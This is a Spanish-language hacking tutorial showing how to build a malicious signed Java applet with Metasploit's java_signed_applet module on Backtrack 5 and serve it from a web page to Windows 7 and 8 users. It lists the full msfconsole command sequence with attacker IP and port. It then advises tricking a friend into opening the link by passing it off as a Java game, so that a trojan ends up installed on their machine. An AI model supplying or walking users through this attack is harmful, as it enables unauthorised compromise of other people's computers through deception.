Hace ya un tiempo que Java es el disfrute de aquellos que desean introducirse en nuestras maquinas. El agujero de seguridad es tan grade que hizo que Microsoft se replanteara su uso a la salida de Windows 8. Aunque la nueva versión del S.O (para tabletas la verdad que es una maravilla) aportó una multitud de funciones para la seguridad de nuestros equipos esa decisión le paso factura y ahora veremos como de fácil le seria a alguien explotar esa vulnerabilidad.


El proceso es fácil, rápido y solo necesitamos los siguientes Ingredientes: 
    • Distribución Linux:  Backtrack 5 - R3 ( R1 y R2 también sirven pero ya que estáis bajaros la ultima versión desde la pagina oficial que es gratis. ) http://www.backtrack-linux.org/
    • Tener instalado el Metasploit Frameworks (Si os habeis bajado la ultima versión viene de serie con el S.O)
    • Un Windows 8 
    • Internet Explorer, Mozilla FireFox, Google Chrome (si, todos se lo comen)

Básicamente vamos a utilizar [java_signed_applet]. Nos crearemos un archivo .Jar vía Metasploit y se lo colaremos a la victima mediante una pagina web la cual abrirá, automáticamente, un cuadro de dialogo para que la victima acepte y le colemos el malware. (Resumen básico y rápido)

Código:
    • msfconsole <-- con este comando abrimos a Metasploit 
    • use java_signed_applet <-- selecionamos el exploit que os he explicado antes
    • set  lhost 192.168.1.31 <-- definimos la IP del atacante por la cual nos pondremos a la escucha en el momento que entre en la web.
    • set lport 80 <--  (definimos el puerto del atacante, también sera importante para escuchar mas adelante) 
    • set URIPATH / <-- hay un espacio enre Uripath y la [/] este comando sirve para crear un Identidicador de Recursos Uniforme de forma aleatoria. URI es una cadena caracteres la cual se utiliza para identificar un nombre o un recurso. 
    • exploit <-- ejecutamos el exploit 
Con esto ya tendremos montada la pagina web con una dirección http://192.168.xxx.xxx.xxx esto lo ponemos en algún mail o se lo pasamos a algún colega diciéndole que mire que juego java mas chulo he hecho en clase de programación o lo ocultamos de alguna manera. (yo solo os pongo el método de ataque el arte ninja corre de vuestra parte o os presentáis en mis conferencias xD)


Una vez que una victima haya picado el anzuelo le aparecerá la siguiente venta. Cabe remarcar que yo he utilizado este exploit tanto en windows 7 como en windows 8 y el resultado es el mismo. 

Internet Explorer en Windows 8

Como es el juego de un colega o la trola que os hayáis inventado será bueno, por lo que lo aceptara y nosotros veremos como el Malware empieza a funcionar mostrando que se envía el archivo SITE LOADER.JAR (como podeis ver hay 2 IPs diferentes corresponden al Windows 8 y a Windows 7 anterior mente mencionados como veis a los 2 ha sido enviado)

Perfecto ahora solo queda que el "colega" haga aceptar otra vez en el panel de SiteLoader y para dentro. Que cuele ya depende de vuestra Ingeniería social. Pero lo que os quiero hacer ver es que muchas veces salen carteles de estos y pocos somos los que le damos a cancelar, o nos los miramos mínimamente.

Como veis la barra de arriba ha cambiado un poco eso es que estoy utilizando Windows 7

Después ya tendrá un bonito troyano dentro al cual le podremos decir que haga las mil maravillas.

_________________________________________________________
Las Gracias A Quienes Se Las Merecen:
---------------------------------------------------------------------------------------------